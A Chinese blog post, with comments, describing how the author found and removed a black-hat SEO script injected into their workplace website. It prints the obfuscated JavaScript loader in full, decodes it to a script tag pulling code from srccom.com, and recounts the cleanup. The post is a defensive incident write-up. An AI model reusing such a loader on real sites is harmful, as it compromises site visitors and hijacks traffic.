晚上无聊,点到自家单位的网站,等待加载的时候发现一个没见过的域名【srccom.com】,印象中自己好像没有加过类似的代码,于是开始倒查,发现调用的代码来自这个JS(由于问题已经处理,所以文件已经变成404):
文件内容如下:
function CurrentXmlFrmFocus()
{
var arnElement=[2,9,3,8,2,8,7,5,4,3,10,5];
var arsOffset=[" ",":",".","/","<",">","=","'","SRC","COM","SCRIPT","HTTP"];
var ardPopOpacity=[4,10,0,8,6,7,11,1,3,3,8,9];
var strgAttribute="";ardPopOpacity=ardPopOpacity.concat(arnElement);
for(var i=0;i<ardPopOpacity.length;i++)strgAttribute=strgAttribute+arsOffset[ardPopOpacity[i]];document.writeln(strgAttribute);
}
CurrentXmlFrmFocus();
绕了个弯子,稍微分析一下的话,是向当前页写入以下一行代码:
<script src=”http://srccom.com/src.src” />
于是反向访问过去,冒出一大堆代码:
由于之前也被别人写入过SEO的代码,猜测可能是一样的东西,所以没有细看,选了一个关键字在网上搜了一下,果然是做黑帽SEO的淘宝客(介绍文章在这里)。
删掉对应页面中的调用代码,然后立即回到服务器上看修改时间,发现是去年11月写入的,想起那次所在的主机被人给旁注了,应该不是自己的问题,松口气。
我平常网站都是靠chinaz做监控的,现在还看不到奇怪的url,应该是没问题吧?
这个不是很明白,我是在Chrome加载网页的时候卡了一下才发现的,还是建议手工检查主要文件有没有异常。
感觉Chinaz的那些工具还是很使用的。今天发现你的网站的百度快照有一个多月没更新了,是不是服务器IP在百度黑名单里啊?
最近变了几次CDN,估计是不利于搜索引擎收录,不过我的Blog不依靠访问量存活,没关系。
没有访问量的话,不是略寂寞么。我也是弄了好久才让百度全收录,不过还是没啥流量,寂寞死了。
指望着博客赚人气就太累啦。
只是为了能为世界做贡献,才做博客的。
拍拍胸脯,我写过wiki,写过教程,写过报道,写过技术文摘;我比直接把别人成果抄过来改个名贴上去当无赖更有良心。
赚人气的话,看看好久都没玩的微博,咱也不差那几个僵尸粉。
世风日下,复制粘贴以及质量并不算优良的东西可以大行其道也不能只怪个人作风,做好自己就行了,这也不是件容易的事。